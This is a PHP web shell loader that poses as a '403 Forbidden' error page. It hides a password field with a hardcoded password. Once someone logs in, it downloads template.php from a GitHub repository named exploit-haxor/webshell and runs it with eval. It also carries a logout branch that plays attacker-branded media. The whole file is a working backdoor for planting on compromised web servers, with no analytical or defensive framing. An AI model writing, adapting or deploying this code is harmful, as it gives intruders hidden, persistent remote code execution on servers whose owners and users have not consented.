<?php session_start(); function redirectToLogin() { header("Location: {$_SERVER['PHP_SELF']}"); exit; } function logout() { $_SESSION = []; if (ini_get("session.use_cookies")) { $params = session_get_cookie_params(); setcookie(session_name(), '', time() - 42000, $params["path"], $params["domain"], $params["secure"], $params["httponly"]); } session_destroy(); } if (isset($_GET['logoutcok'])) { logout();	echo '<script>
				document.querySelector("html").innerHTML = "<img style='display:block;position:absolute;top: 0;right: 0;bottom: 0;left: 0;z-index: 10;overflow-y: scroll; width: 100%; height: 100%;' src='https://raw.githubusercontent.com/exploit-haxor/webshell/main/login.gif'>";
				var source = "https://raw.githubusercontent.com/exploit-haxor/webshell/main/p.mp3"
				var audio = document.createElement("audio");
				audio.autoplay = true;
				audio.load()
				audio.play();
				audio.src = source;
			</script>'; redirectToLogin(); } if (!isset($_SESSION['logged_in']) || !$_SESSION['logged_in']) { $expected_password = "jembotmawot"; if ($_SERVER["REQUEST_METHOD"] == "POST") { $password = $_POST["password"]; if ($password == $expected_password) { $_SESSION['logged_in'] = true; header("Location: {$_SERVER['PHP_SELF']}"); exit; } redirectToLogin(); } } if (isset($_SESSION['logged_in']) && $_SESSION['logged_in']) { $url_sumber = "https://raw.githubusercontent.com/exploit-haxor/webshell/main/template.php"; if (!filter_var($url_sumber, FILTER_VALIDATE_URL)) { echo "<center><h1 style='color:red;'>Link Shell Kau Ga Valid CIBAI!</h1></center>"; exit; } $temp_file = tempnam(sys_get_temp_dir(), 'remote_script_'); $content = file_get_contents($url_sumber); if ($content !== false && file_put_contents($temp_file, $content) !== false) { eval('?>' . $content); } else { echo "<center><h1 style='color:red;'>Gagal Bypass Shell Cok !</h1></center>"; } if (file_exists($temp_file)) { unlink($temp_file); } } ?><html><head><title>403 Forbidden</title></head><body><?php if (!isset($_SESSION['logged_in']) || !$_SESSION['logged_in']): ?><h1>Forbidden</h1><p>You don't have permission to access <?php echo $_SERVER['PHP_SELF']; ?> on this server.</p><hr><form method="post"> <input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password" placeholder=""></form><?php endif; ?></body></html>
